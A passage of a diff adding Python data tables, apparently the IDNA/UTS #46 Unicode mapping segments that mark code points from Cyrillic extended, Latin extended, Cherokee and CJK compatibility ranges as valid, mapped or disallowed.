(0xA641, 'V'), + (0xA642, 'M', 'ꙃ'), + (0xA643, 'V'), + (0xA644, 'M', 'ꙅ'), + (0xA645, 'V'), + (0xA646, 'M', 'ꙇ'), + (0xA647, 'V'), + (0xA648, 'M', 'ꙉ'), + (0xA649, 'V'), + (0xA64A, 'M', 'ꙋ'), + (0xA64B, 'V'), + (0xA64C, 'M', 'ꙍ'), + (0xA64D, 'V'), + (0xA64E, 'M', 'ꙏ'), + (0xA64F, 'V'), + (0xA650, 'M', 'ꙑ'), + (0xA651, 'V'), + (0xA652, 'M', 'ꙓ'), + (0xA653, 'V'), + (0xA654, 'M', 'ꙕ'), + (0xA655, 'V'), + (0xA656, 'M', 'ꙗ'), + (0xA657, 'V'), + (0xA658, 'M', 'ꙙ'), + (0xA659, 'V'), + (0xA65A, 'M', 'ꙛ'), + (0xA65B, 'V'), + (0xA65C, 'M', 'ꙝ'), + (0xA65D, 'V'), + (0xA65E, 'M', 'ꙟ'), + (0xA65F, 'V'), + (0xA660, 'M', 'ꙡ'), + (0xA661, 'V'), + (0xA662, 'M', 'ꙣ'), + (0xA663, 'V'), + (0xA664, 'M', 'ꙥ'), + (0xA665, 'V'), + (0xA666, 'M', 'ꙧ'), + (0xA667, 'V'), + (0xA668, 'M', 'ꙩ'), + (0xA669, 'V'), + (0xA66A, 'M', 'ꙫ'), + (0xA66B, 'V'), + (0xA66C, 
'M', 'ꙭ'), + (0xA66D, 'V'), + (0xA680, 'M', 'ꚁ'), + (0xA681, 'V'), + (0xA682, 'M', 'ꚃ'), + (0xA683, 'V'), + (0xA684, 'M', 'ꚅ'), + (0xA685, 'V'), + (0xA686, 'M', 'ꚇ'), + (0xA687, 'V'), + (0xA688, 'M', 'ꚉ'), + (0xA689, 'V'), + (0xA68A, 'M', 'ꚋ'), + (0xA68B, 'V'), + (0xA68C, 'M', 'ꚍ'), + (0xA68D, 'V'), + ] + +def _seg_36() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xA68E, 'M', 'ꚏ'), + (0xA68F, 'V'), + (0xA690, 'M', 'ꚑ'), + (0xA691, 'V'), + (0xA692, 'M', 'ꚓ'), + (0xA693, 'V'), + (0xA694, 'M', 'ꚕ'), + (0xA695, 'V'), + (0xA696, 'M', 'ꚗ'), + (0xA697, 'V'), + (0xA698, 'M', 'ꚙ'), + (0xA699, 'V'), + (0xA69A, 'M', 'ꚛ'), + (0xA69B, 'V'), + (0xA69C, 'M', 'ъ'), + (0xA69D, 'M', 'ь'), + (0xA69E, 'V'), + (0xA6F8, 'X'), + (0xA700, 'V'), + (0xA722, 'M', 'ꜣ'), + (0xA723, 'V'), + (0xA724, 'M', 'ꜥ'), + (0xA725, 'V'), + (0xA726, 'M', 'ꜧ'), + (0xA727, 'V'), + (0xA728, 'M', 'ꜩ'), + (0xA729, 'V'), + (0xA72A, 'M', 'ꜫ'), + (0xA72B, 'V'), + (0xA72C, 'M', 'ꜭ'), + (0xA72D, 'V'), + (0xA72E, 'M', 'ꜯ'), + (0xA72F, 'V'), + (0xA732, 'M', 'ꜳ'), + (0xA733, 'V'), + (0xA734, 'M', 'ꜵ'), + (0xA735, 'V'), + (0xA736, 'M', 'ꜷ'), + (0xA737, 'V'), + (0xA738, 'M', 'ꜹ'), + (0xA739, 'V'), + (0xA73A, 'M', 'ꜻ'), + (0xA73B, 'V'), + (0xA73C, 'M', 'ꜽ'), + (0xA73D, 'V'), + (0xA73E, 'M', 'ꜿ'), + (0xA73F, 'V'), + (0xA740, 'M', 'ꝁ'), + (0xA741, 'V'), + (0xA742, 'M', 'ꝃ'), + (0xA743, 'V'), + (0xA744, 'M', 'ꝅ'), + (0xA745, 'V'), + (0xA746, 'M', 'ꝇ'), + (0xA747, 'V'), + (0xA748, 'M', 'ꝉ'), + (0xA749, 'V'), + (0xA74A, 'M', 'ꝋ'), + (0xA74B, 'V'), + (0xA74C, 'M', 'ꝍ'), + (0xA74D, 'V'), + (0xA74E, 'M', 'ꝏ'), + (0xA74F, 'V'), + (0xA750, 'M', 'ꝑ'), + (0xA751, 'V'), + (0xA752, 'M', 'ꝓ'), + (0xA753, 'V'), + (0xA754, 'M', 'ꝕ'), + (0xA755, 'V'), + (0xA756, 'M', 'ꝗ'), + (0xA757, 'V'), + (0xA758, 'M', 'ꝙ'), + (0xA759, 'V'), + (0xA75A, 'M', 'ꝛ'), + (0xA75B, 'V'), + (0xA75C, 'M', 'ꝝ'), + (0xA75D, 'V'), + (0xA75E, 'M', 'ꝟ'), + (0xA75F, 'V'), + (0xA760, 'M', 'ꝡ'), + (0xA761, 'V'), + (0xA762, 'M', 'ꝣ'), + (0xA763, 'V'), + (0xA764, 'M', 'ꝥ'), + (0xA765, 'V'), + (0xA766, 'M', 'ꝧ'), + (0xA767, 'V'), + (0xA768, 'M', 'ꝩ'), + (0xA769, 'V'), + (0xA76A, 'M', 'ꝫ'), + (0xA76B, 'V'), + (0xA76C, 'M', 'ꝭ'), + (0xA76D, 'V'), + (0xA76E, 'M', 'ꝯ'), + (0xA76F, 'V'), + (0xA770, 'M', 'ꝯ'), + (0xA771, 'V'), + (0xA779, 'M', 'ꝺ'), + (0xA77A, 'V'), + (0xA77B, 'M', 'ꝼ'), + ] + +def _seg_37() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xA77C, 'V'), + (0xA77D, 'M', 'ᵹ'), + (0xA77E, 'M', 'ꝿ'), + (0xA77F, 'V'), + (0xA780, 'M', 'ꞁ'), + (0xA781, 'V'), + (0xA782, 'M', 'ꞃ'), + (0xA783, 'V'), + (0xA784, 'M', 'ꞅ'), + (0xA785, 'V'), + (0xA786, 'M', 'ꞇ'), + (0xA787, 'V'), + (0xA78B, 'M', 'ꞌ'), + (0xA78C, 'V'), + (0xA78D, 'M', 'ɥ'), + (0xA78E, 'V'), + (0xA790, 'M', 'ꞑ'), + (0xA791, 'V'), + (0xA792, 'M', 'ꞓ'), + (0xA793, 'V'), + (0xA796, 'M', 'ꞗ'), + (0xA797, 'V'), + (0xA798, 'M', 'ꞙ'), + (0xA799, 'V'), + (0xA79A, 'M', 'ꞛ'), + (0xA79B, 'V'), + (0xA79C, 'M', 'ꞝ'), + (0xA79D, 'V'), + (0xA79E, 'M', 'ꞟ'), + (0xA79F, 'V'), + (0xA7A0, 'M', 'ꞡ'), + (0xA7A1, 'V'), + (0xA7A2, 'M', 'ꞣ'), + (0xA7A3, 'V'), + (0xA7A4, 'M', 'ꞥ'), + (0xA7A5, 'V'), + (0xA7A6, 'M', 'ꞧ'), + (0xA7A7, 'V'), + (0xA7A8, 'M', 'ꞩ'), + (0xA7A9, 'V'), + (0xA7AA, 'M', 'ɦ'), + (0xA7AB, 'M', 'ɜ'), + (0xA7AC, 'M', 'ɡ'), + (0xA7AD, 'M', 'ɬ'), + (0xA7AE, 'M', 'ɪ'), + (0xA7AF, 'V'), + (0xA7B0, 'M', 'ʞ'), + (0xA7B1, 'M', 'ʇ'), + (0xA7B2, 'M', 'ʝ'), + (0xA7B3, 'M', 'ꭓ'), + (0xA7B4, 'M', 'ꞵ'), + (0xA7B5, 'V'), + (0xA7B6, 'M', 'ꞷ'), + (0xA7B7, 'V'), + (0xA7B8, 'M', 'ꞹ'), + (0xA7B9, 'V'), + (0xA7BA, 'M', 
'ꞻ'), + (0xA7BB, 'V'), + (0xA7BC, 'M', 'ꞽ'), + (0xA7BD, 'V'), + (0xA7BE, 'M', 'ꞿ'), + (0xA7BF, 'V'), + (0xA7C0, 'M', 'ꟁ'), + (0xA7C1, 'V'), + (0xA7C2, 'M', 'ꟃ'), + (0xA7C3, 'V'), + (0xA7C4, 'M', 'ꞔ'), + (0xA7C5, 'M', 'ʂ'), + (0xA7C6, 'M', 'ᶎ'), + (0xA7C7, 'M', 'ꟈ'), + (0xA7C8, 'V'), + (0xA7C9, 'M', 'ꟊ'), + (0xA7CA, 'V'), + (0xA7CB, 'X'), + (0xA7D0, 'M', 'ꟑ'), + (0xA7D1, 'V'), + (0xA7D2, 'X'), + (0xA7D3, 'V'), + (0xA7D4, 'X'), + (0xA7D5, 'V'), + (0xA7D6, 'M', 'ꟗ'), + (0xA7D7, 'V'), + (0xA7D8, 'M', 'ꟙ'), + (0xA7D9, 'V'), + (0xA7DA, 'X'), + (0xA7F2, 'M', 'c'), + (0xA7F3, 'M', 'f'), + (0xA7F4, 'M', 'q'), + (0xA7F5, 'M', 'ꟶ'), + (0xA7F6, 'V'), + (0xA7F8, 'M', 'ħ'), + (0xA7F9, 'M', 'œ'), + (0xA7FA, 'V'), + (0xA82D, 'X'), + (0xA830, 'V'), + (0xA83A, 'X'), + (0xA840, 'V'), + (0xA878, 'X'), + (0xA880, 'V'), + (0xA8C6, 'X'), + ] + +def _seg_38() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xA8CE, 'V'), + (0xA8DA, 'X'), + (0xA8E0, 'V'), + (0xA954, 'X'), + (0xA95F, 'V'), + (0xA97D, 'X'), + (0xA980, 'V'), + (0xA9CE, 'X'), + (0xA9CF, 'V'), + (0xA9DA, 'X'), + (0xA9DE, 'V'), + (0xA9FF, 'X'), + (0xAA00, 'V'), + (0xAA37, 'X'), + (0xAA40, 'V'), + (0xAA4E, 'X'), + (0xAA50, 'V'), + (0xAA5A, 'X'), + (0xAA5C, 'V'), + (0xAAC3, 'X'), + (0xAADB, 'V'), + (0xAAF7, 'X'), + (0xAB01, 'V'), + (0xAB07, 'X'), + (0xAB09, 'V'), + (0xAB0F, 'X'), + (0xAB11, 'V'), + (0xAB17, 'X'), + (0xAB20, 'V'), + (0xAB27, 'X'), + (0xAB28, 'V'), + (0xAB2F, 'X'), + (0xAB30, 'V'), + (0xAB5C, 'M', 'ꜧ'), + (0xAB5D, 'M', 'ꬷ'), + (0xAB5E, 'M', 'ɫ'), + (0xAB5F, 'M', 'ꭒ'), + (0xAB60, 'V'), + (0xAB69, 'M', 'ʍ'), + (0xAB6A, 'V'), + (0xAB6C, 'X'), + (0xAB70, 'M', 'Ꭰ'), + (0xAB71, 'M', 'Ꭱ'), + (0xAB72, 'M', 'Ꭲ'), + (0xAB73, 'M', 'Ꭳ'), + (0xAB74, 'M', 'Ꭴ'), + (0xAB75, 'M', 'Ꭵ'), + (0xAB76, 'M', 'Ꭶ'), + (0xAB77, 'M', 'Ꭷ'), + (0xAB78, 'M', 'Ꭸ'), + (0xAB79, 'M', 'Ꭹ'), + (0xAB7A, 'M', 'Ꭺ'), + (0xAB7B, 'M', 'Ꭻ'), + (0xAB7C, 'M', 'Ꭼ'), + (0xAB7D, 'M', 'Ꭽ'), + (0xAB7E, 'M', 'Ꭾ'), + (0xAB7F, 'M', 'Ꭿ'), + (0xAB80, 'M', 'Ꮀ'), + (0xAB81, 'M', 'Ꮁ'), + (0xAB82, 'M', 'Ꮂ'), + (0xAB83, 'M', 'Ꮃ'), + (0xAB84, 'M', 'Ꮄ'), + (0xAB85, 'M', 'Ꮅ'), + (0xAB86, 'M', 'Ꮆ'), + (0xAB87, 'M', 'Ꮇ'), + (0xAB88, 'M', 'Ꮈ'), + (0xAB89, 'M', 'Ꮉ'), + (0xAB8A, 'M', 'Ꮊ'), + (0xAB8B, 'M', 'Ꮋ'), + (0xAB8C, 'M', 'Ꮌ'), + (0xAB8D, 'M', 'Ꮍ'), + (0xAB8E, 'M', 'Ꮎ'), + (0xAB8F, 'M', 'Ꮏ'), + (0xAB90, 'M', 'Ꮐ'), + (0xAB91, 'M', 'Ꮑ'), + (0xAB92, 'M', 'Ꮒ'), + (0xAB93, 'M', 'Ꮓ'), + (0xAB94, 'M', 'Ꮔ'), + (0xAB95, 'M', 'Ꮕ'), + (0xAB96, 'M', 'Ꮖ'), + (0xAB97, 'M', 'Ꮗ'), + (0xAB98, 'M', 'Ꮘ'), + (0xAB99, 'M', 'Ꮙ'), + (0xAB9A, 'M', 'Ꮚ'), + (0xAB9B, 'M', 'Ꮛ'), + (0xAB9C, 'M', 'Ꮜ'), + (0xAB9D, 'M', 'Ꮝ'), + (0xAB9E, 'M', 'Ꮞ'), + (0xAB9F, 'M', 'Ꮟ'), + (0xABA0, 'M', 'Ꮠ'), + (0xABA1, 'M', 'Ꮡ'), + (0xABA2, 'M', 'Ꮢ'), + (0xABA3, 'M', 'Ꮣ'), + (0xABA4, 'M', 'Ꮤ'), + (0xABA5, 'M', 'Ꮥ'), + (0xABA6, 'M', 'Ꮦ'), + (0xABA7, 'M', 'Ꮧ'), + (0xABA8, 'M', 'Ꮨ'), + (0xABA9, 'M', 'Ꮩ'), + (0xABAA, 'M', 'Ꮪ'), + ] + +def _seg_39() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xABAB, 'M', 'Ꮫ'), + (0xABAC, 'M', 'Ꮬ'), + (0xABAD, 'M', 'Ꮭ'), + (0xABAE, 'M', 'Ꮮ'), + (0xABAF, 'M', 'Ꮯ'), + (0xABB0, 'M', 'Ꮰ'), + (0xABB1, 'M', 'Ꮱ'), + (0xABB2, 'M', 'Ꮲ'), + (0xABB3, 'M', 'Ꮳ'), + (0xABB4, 'M', 'Ꮴ'), + (0xABB5, 'M', 'Ꮵ'), + (0xABB6, 'M', 'Ꮶ'), + (0xABB7, 'M', 'Ꮷ'), + (0xABB8, 'M', 'Ꮸ'), + (0xABB9, 'M', 'Ꮹ'), + (0xABBA, 'M', 'Ꮺ'), + (0xABBB, 'M', 'Ꮻ'), + (0xABBC, 'M', 'Ꮼ'), + (0xABBD, 'M', 'Ꮽ'), + (0xABBE, 'M', 'Ꮾ'), + (0xABBF, 'M', 'Ꮿ'), + (0xABC0, 'V'), + (0xABEE, 'X'), + (0xABF0, 'V'), + (0xABFA, 'X'), + 
(0xAC00, 'V'), + (0xD7A4, 'X'), + (0xD7B0, 'V'), + (0xD7C7, 'X'), + (0xD7CB, 'V'), + (0xD7FC, 'X'), + (0xF900, 'M', '豈'), + (0xF901, 'M', '更'), + (0xF902, 'M', '車'), + (0xF903, 'M', '賈'), + (0xF904, 'M', '滑'), + (0xF905, 'M', '串'), + (0xF906, 'M', '句'), + (0xF907, 'M', '龜'), + (0xF909, 'M', '契'), + (0xF90A, 'M', '金'), + (0xF90B, 'M', '喇'), + (0xF90C, 'M', '奈'), + (0xF90D, 'M', '懶'), + (0xF90E, 'M', '癩'), + (0xF90F, 'M', '羅'), + (0xF910, 'M', '蘿'), + (0xF911, 'M', '螺'), + (0xF912, 'M', '裸'), + (0xF913, 'M', '邏'), + (0xF914, 'M', '樂'), + (0xF915, 'M', '洛'), + (0xF916, 'M', '烙'), + (0xF917, 'M', '珞'), + (0xF918, 'M', '落'), + (0xF919, 'M', '酪'), + (0xF91A, 'M', '駱'), + (0xF91B, 'M', '亂'), + (0xF91C, 'M', '卵'), + (0xF91D, 'M', '欄'), + (0xF91E, 'M', '爛'), + (0xF91F, 'M', '蘭'), + (0xF920, 'M', '鸞'), + (0xF921, 'M', '嵐'), + (0xF922, 'M', '濫'), + (0xF923, 'M', '藍'), + (0xF924, 'M', '襤'), + (0xF925, 'M', '拉'), + (0xF926, 'M', '臘'), + (0xF927, 'M', '蠟'), + (0xF928, 'M', '廊'), + (0xF929, 'M', '朗'), + (0xF92A, 'M', '浪'), + (0xF92B, 'M', '狼'), + (0xF92C, 'M', '郎'), + (0xF92D, 'M', '來'), + (0xF92E, 'M', '冷'), + (0xF92F, 'M', '勞'), + (0xF930, 'M', '擄'), + (0xF931, 'M', '櫓'), + (0xF932, 'M', '爐'), + (0xF933, 'M', '盧'), + (0xF934, 'M', '老'), + (0xF935, 'M', '蘆'), + (0xF936, 'M', '虜'), + (0xF937, 'M', '路'), + (0xF938, 'M', '露'), + (0xF939, 'M', '魯'), + (0xF93A, 'M', '鷺'), + (0xF93B, 'M', '碌'), + (0xF93C, 'M', '祿'), + (0xF93D, 'M', '綠'), + (0xF93E, 'M', '菉'), + (0xF93F, 'M', '錄'), + (0xF940, 'M', '鹿'), + (0xF941, 'M', '論'), + (0xF942, 'M', '壟'), + (0xF943, 'M', '弄'), + (0xF944, 'M', '籠'), + (0xF945, 'M', '聾'), + ] + +def _seg_40() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xF946, 'M', '牢'), + (0xF947, 'M', '磊'), + (0xF948, 'M', '賂'), + (0xF949, 'M', '雷'), + (0xF94A, 'M', '壘'), + (0xF94B, 'M', '屢'), + (0xF94C, 'M', '樓'), + (0xF94D, 'M', '淚'), + (0xF94E, 'M', '漏'), + (0xF94F, 'M', '累'), + (0xF950, 'M', '縷'), + (0xF951, 'M', '陋'), + (0xF952, 'M', '勒'), + (0xF953, 'M', '肋'), + (0xF954, 'M', '凜'), + (0xF955, 'M', '凌'), + (0xF956, 'M', '稜'), + (0xF957, 'M', '綾'), + (0xF958, 'M', '菱'), + (0xF959, 'M', '陵'), + (0xF95A, 'M', '讀'), + (0xF95B, 'M', '拏'), + (0xF95C, 'M', '樂'), + (0xF95D, 'M', '諾'), + (0xF95E, 'M', '丹'), + (0xF95F, 'M', '寧'), + (0xF960, 'M', '怒'), + (0xF961, 'M', '率'), + (0xF962, 'M', '異'), + (0xF963, 'M', '北'), + (0xF964, 'M', '磻'), + (0xF965, 'M', '便'), + (0xF966, 'M', '復'), + (0xF967, 'M', '不'), + (0xF968, 'M', '泌'), + (0xF969, 'M', '數'), + (0xF96A, 'M', '索'), + (0xF96B, 'M', '參'), + (0xF96C, 'M', '塞'), + (0xF96D, 'M', '省'), + (0xF96E, 'M', '葉'), + (0xF96F, 'M', '說'), + (0xF970, 'M', '殺'), + (0xF971, 'M', '辰'), + (0xF972, 'M', '沈'), + (0xF973, 'M', '拾'), + (0xF974, 'M', '若'), + (0xF975, 'M', '掠'), + (0xF976, 'M', '略'), + (0xF977, 'M', '亮'), + (0xF978, 'M', '兩'), + (0xF979, 'M', '凉'), + (0xF97A, 'M', '梁'), + (0xF97B, 'M', '糧'), + (0xF97C, 'M', '良'), + (0xF97D, 'M', '諒'), + (0xF97E, 'M', '量'), + (0xF97F, 'M', '勵'), + (0xF980, 'M', '呂'), + (0xF981, 'M', '女'), + (0xF982, 'M', '廬'), + (0xF983, 'M', '旅'), + (0xF984, 'M', '濾'), + (0xF985, 'M', '礪'), + (0xF986, 'M', '閭'), + (0xF987, 'M', '驪'), + (0xF988, 'M', '麗'), + (0xF989, 'M', '黎'), + (0xF98A, 'M', '力'), + (0xF98B, 'M', '曆'), + (0xF98C, 'M', '歷'), + (0xF98D, 'M', '轢'), + (0xF98E, 'M', '年'), + (0xF98F, 'M', '憐'), + (0xF990, 'M', '戀'), + (0xF991, 'M', '撚'), + (0xF992, 'M', '漣'), + (0xF993, 'M', '煉'), + (0xF994, 'M', '璉'), + (0xF995, 'M', '秊'), + (0xF996, 'M', '練'), + (0xF997, 'M', '聯'), + (0xF998, 'M', '輦'), + (0xF999, 'M', '蓮'), + 
(0xF99A, 'M', '連'), + (0xF99B, 'M', '鍊'), + (0xF99C, 'M', '列'), + (0xF99D, 'M', '劣'), + (0xF99E, 'M', '咽'), + (0xF99F, 'M', '烈'), + (0xF9A0, 'M', '裂'), + (0xF9A1, 'M', '說'), + (0xF9A2, 'M', '廉'), + (0xF9A3, 'M', '念'), + (0xF9A4, 'M', '捻'), + (0xF9A5, 'M', '殮'), + (0xF9A6, 'M', '簾'), + (0xF9A7, 'M', '獵'), + (0xF9A8, 'M', '令'), + (0xF9A9, 'M', '囹'), + ] + +def _seg_41() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xF9AA, 'M', '寧'), + (0xF9AB, 'M', '嶺'), + (0xF9AC, 'M', '怜'), + (0xF9AD, 'M', '玲'), + (0xF9AE, 'M', '瑩'), + (0xF9AF, 'M', '羚'), + (0xF9B0, 'M', '聆'), + (0xF9B1, 'M', '鈴'), + (0xF9B2, 'M', '零'), + (0xF9B3, 'M', '靈'), + (0xF9B4, 'M', '領'), + (0xF9B5, 'M', '例'), + (0xF9B6, 'M', '禮'), + (0xF9B7, 'M', '醴'), + (0xF9B8, 'M', '隸'), + (0xF9B9, 'M', '惡'), + (0xF9BA, 'M', '了'), + (0xF9BB, 'M', '僚'), + (0xF9BC, 'M', '寮'), + (0xF9BD, 'M', '尿'), + (0xF9BE, 'M', '料'), + (0xF9BF, 'M', '樂'), + (0xF9C0, 'M', '燎'), + (0xF9C1, 'M', '療'), + (0xF9C2, 'M', '蓼'), + (0xF9C3, 'M', '遼'), + (0xF9C4, 'M', '龍'), + (0xF9C5, 'M', '暈'), + (0xF9C6, 'M', '阮'), + (0xF9C7, 'M', '劉'), + (0xF9C8, 'M', '杻'), + (0xF9C9, 'M', '柳'), + (0xF9CA, 'M', '流'), + (0xF9CB, 'M', '溜'), + (0xF9CC, 'M', '琉'), + (0xF9CD, 'M', '留'), + (0xF9CE, 'M', '硫'), + (0xF9CF, 'M', '紐'), + (0xF9D0, 'M', '類'), + (0xF9D1, 'M', '六'), + (0xF9D2, 'M', '戮'), + (0xF9D3, 'M', '陸'), + (0xF9D4, 'M', '倫'), + (0xF9D5, 'M', '崙'), + (0xF9D6, 'M', '淪'), + (0xF9D7, 'M', '輪'), + (0xF9D8, 'M', '律'), + (0xF9D9, 'M', '慄'), + (0xF9DA, 'M', '栗'), + (0xF9DB, 'M', '率'), + (0xF9DC, 'M', '隆'), + (0xF9DD, 'M', '利'), + (0xF9DE, 'M', '吏'), + (0xF9DF, 'M', '履'), + (0xF9E0, 'M', '易'), + (0xF9E1, 'M', '李'), + (0xF9E2, 'M', '梨'), + (0xF9E3, 'M', '泥'), + (0xF9E4, 'M', '理'), + (0xF9E5, 'M', '痢'), + (0xF9E6, 'M', '罹'), + (0xF9E7, 'M', '裏'), + (0xF9E8, 'M', '裡'), + (0xF9E9, 'M', '里'), + (0xF9EA, 'M', '離'), + (0xF9EB, 'M', '匿'), + (0xF9EC, 'M', '溺'), + (0xF9ED, 'M', '吝'), + (0xF9EE, 'M', '燐'), + (0xF9EF, 'M', '璘'), + (0xF9F0, 'M', '藺'), + (0xF9F1, 'M', '隣'), + (0xF9F2, 'M', '鱗'), + (0xF9F3, 'M', '麟'), + (0xF9F4, 'M', '林'), + (0xF9F5, 'M', '淋'), + (0xF9F6, 'M', '臨'), + (0xF9F7, 'M', '立'), + (0xF9F8, 'M', '笠'), + (0xF9F9, 'M', '粒'), + (0xF9FA, 'M', '狀'), + (0xF9FB, 'M', '炙'), + (0xF9FC, 'M', '識'), + (0xF9FD, 'M', '什'), + (0xF9FE, 'M', '茶'), + (0xF9FF, 'M', '刺'), + (0xFA00, 'M', '切'), + (0xFA01, 'M', '度'), + (0xFA02, 'M', '拓'), + (0xFA03, 'M', '糖'), + (0xFA04, 'M', '宅'), + (0xFA05, 'M', '洞'), + (0xFA06, 'M', '暴'), + (0xFA07, 'M', '輻'), + (0xFA08, 'M', '行'), + (0xFA09, 'M', '降'), + (0xFA0A, 'M', '見'), + (0xFA0B, 'M', '廓'), + (0xFA0C, 'M', '兀'), + (0xFA0D, 'M', '嗀'), + ] + +def _seg_42() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFA0E, 'V'), + (0xFA10, 'M', '塚'), + (0xFA11, 'V'), + (0xFA12, 'M', '晴'), + (0xFA13, 'V'), + (0xFA15, 'M', '凞'), + (0xFA16, 'M', '猪'), + (0xFA17, 'M', '益'), + (0xFA18, 'M', '礼'), + (0xFA19, 'M', '神'), + (0xFA1A, 'M', '祥'), + (0xFA1B, 'M', '福'), + (0xFA1C, 'M', '靖'), + (0xFA1D, 'M', '精'), + (0xFA1E, 'M', '羽'), + (0xFA1F, 'V'), + (0xFA20, 'M', '蘒'), + (0xFA21, 'V'), + (0xFA22, 'M', '諸'), + (0xFA23, 'V'), + (0xFA25, 'M', '逸'), + (0xFA26, 'M', '都'), + (0xFA27, 'V'), + (0xFA2A, 'M', '飯'), + (0xFA2B, 'M', '飼'), + (0xFA2C, 'M', '館'), + (0xFA2D, 'M', '鶴'), + (0xFA2E, 'M', '郞'), + (0xFA2F, 'M', '隷'), + (0xFA30, 'M', '侮'), + (0xFA31, 'M', '僧'), + (0xFA32, 'M', '免'), + (0xFA33, 'M', '勉'), + (0xFA34, 'M', '勤'), + (0xFA35, 'M', '卑'), + (0xFA36, 'M', '喝'), + (0xFA37, 'M', '嘆'), + (0xFA38, 'M', '器'), + (0xFA39, 'M', '塀'), + 
(0xFA3A, 'M', '墨'), + (0xFA3B, 'M', '層'), + (0xFA3C, 'M', '屮'), + (0xFA3D, 'M', '悔'), + (0xFA3E, 'M', '慨'), + (0xFA3F, 'M', '憎'), + (0xFA40, 'M', '懲'), + (0xFA41, 'M', '敏'), + (0xFA42, 'M', '既'), + (0xFA43, 'M', '暑'), + (0xFA44, 'M', '梅'), + (0xFA45, 'M', '海'), + (0xFA46, 'M', '渚'), + (0xFA47, 'M', '漢'), + (0xFA48, 'M', '煮'), + (0xFA49, 'M', '爫'), + (0xFA4A, 'M', '琢'), + (0xFA4B, 'M', '碑'), + (0xFA4C, 'M', '社'), + (0xFA4D, 'M', '祉'), + (0xFA4E, 'M', '祈'), + (0xFA4F, 'M', '祐'), + (0xFA50, 'M', '祖'), + (0xFA51, 'M', '祝'), + (0xFA52, 'M', '禍'), + (0xFA53, 'M', '禎'), + (0xFA54, 'M', '穀'), + (0xFA55, 'M', '突'), + (0xFA56, 'M', '節'), + (0xFA57, 'M', '練'), + (0xFA58, 'M', '縉'), + (0xFA59, 'M', '繁'), + (0xFA5A, 'M', '署'), + (0xFA5B, 'M', '者'), + (0xFA5C, 'M', '臭'), + (0xFA5D, 'M', '艹'), + (0xFA5F, 'M', '著'), + (0xFA60, 'M', '褐'), + (0xFA61, 'M', '視'), + (0xFA62, 'M', '謁'), + (0xFA63, 'M', '謹'), + (0xFA64, 'M', '賓'), + (0xFA65, 'M', '贈'), + (0xFA66, 'M', '辶'), + (0xFA67, 'M', '逸'), + (0xFA68, 'M', '難'), + (0xFA69, 'M', '響'), + (0xFA6A, 'M', '頻'), + (0xFA6B, 'M', '恵'), + (0xFA6C, 'M', '𤋮'), + (0xFA6D, 'M', '舘'), + (0xFA6E, 'X'), + (0xFA70, 'M', '並'), + (0xFA71, 'M', '况'), + (0xFA72, 'M', '全'), + (0xFA73, 'M', '侀'), + (0xFA74, 'M', '充'), + (0xFA75, 'M', '冀'), + (0xFA76, 'M', '勇'), + (0xFA77, 'M', '勺'), + (0xFA78, 'M', '喝'), + ] + +def _seg_43() -> List[Union[Tuple[int, str], Tuple[int, str, str]]]: + return [ + (0xFA79, 'M', '啕'), + (0xFA7A, 'M', '喙'), + (0xFA7B, 'M', '嗢'), + (0xFA7C, 'M', '塚'), + (0xFA7D, 'M', '墳'), + (0xFA7E, 'M', '奄'), + (0xFA7F, 'M', '奔'), + (0xFA80, 'M', '婢'), + (0xFA81, 'M', '嬨'), + (0xFA82, 'M', '廒'), + (0xFA83, 'M', '廙'), + (0xFA84, 'M', '彩'), + (0xFA85, 'M', '徭'), + (0xFA86, 'M', '惘'), + (0xFA87, 'M', '慎'), + (0xFA88, 'M', '愈'), + (0xFA89, 'M', '憎'), + (0xFA8A, 'M', '慠'), + (0xFA8B, 'M', '懲'), + (0xFA8C, 'M', '戴'), + (0xFA8D, 'M', '揄'), + (0xFA8E, 'M', '搜'), + (0xFA8F, 'M', '摒'), + (0xFA90, 'M', '敖'), + (0xFA91, 'M', '晴'), + (0xFA92, 'M', '朗'), + (0xFA93, 'M', '望'), + (0xFA94, 'M', '杖'), + (0xFA95, 'M', '歹'), + (0xFA96, 'M', '殺'), + (0xFA97, 'M', '流'), + (0xFA98, 'M', '滛'), + (0xFA99, 'M', '滋'), + (0xFA9A, 'M', '漢'), + (0xFA9B, 'M', '瀞'), + (0xFA9C, 'M', '煮'), + (0xFA9D, 'M', '瞧'), + (0xFA9E, 'M', '爵'), + (0xFA9F, 'M', '犯'), + (0xFAA0, 'M', '猪'), + (0xFAA1, 'M', '瑱'), + (0xFAA2, 'M', '甆'), + (0xFAA3, 'M', '画'), + (0xFAA4, 'M', '瘝'), + (0xFAA5, 'M', '瘟'), + (0xFAA6, 'M', '益'), + (0xFAA7, 'M', '盛'), + (0xFAA8, 'M', '直'), + (0xFAA9, 'M', '睊'), + (0xFAAA, 'M', '着'), + (0xFAAB, 'M', '磌'), + (0xFAAC, 'M', '窱'), + (0xFAAD, 'M', '節'), + (0xFAAE, 'M', '类'), + (0xFAAF, 'M', '絛'), + (0xFAB0, 'M', '練'), + (0xFAB1, 'M', '缾'), + (0xFAB2, 'M', '者'), + (0xFAB3, 'M', '荒'), + (0xFAB4, 'M', '華'), + (0xFAB5, 'M', '蝹'), + (0xFAB6, 'M', '襁'), + (0xFAB7, 'M', '覆'), + (0xFAB8, 'M', '視'), + (0xFAB9, 'M', '調'), + (0xFABA, 'M', '諸'), + (0xFABB, 'M', '請'), + (0xFABC, 'M', '謁'), + (0xFABD, 'M', '諾'), + (0xFABE, 'M', '諭'), + (0xFABF, 'M', '謹'), + (0xFAC0, 'M', '變'), + (0xFAC1, 'M', '贈'), + (0xFAC2, 'M', '輸'), + (0xFAC3, 'M', '遲'), + (0xFAC4, 'M', '醙'), + (0xFAC5, 'M', '鉶'), + (0xFAC6, 'M', '陼'), + (0xFAC7, 'M', '難'), + (0xFAC8, 'M', '靖'), + (0xFAC9, 'M', '韛'), + (0xFACA, 'M', '響'), + (0xFACB, 'M', '頋'), + (0xFACC, 'M', '頻'), + (0xFACD, 'M', '鬒'), + (0xFACE, 'M', '龜'), + (0xFACF, 'M', '𢡊'), + (0xFAD0, 'M', '𢡄'), + (0xFAD1, 'M', '𣏕'), + (0xFAD2, 'M', '㮝'), + 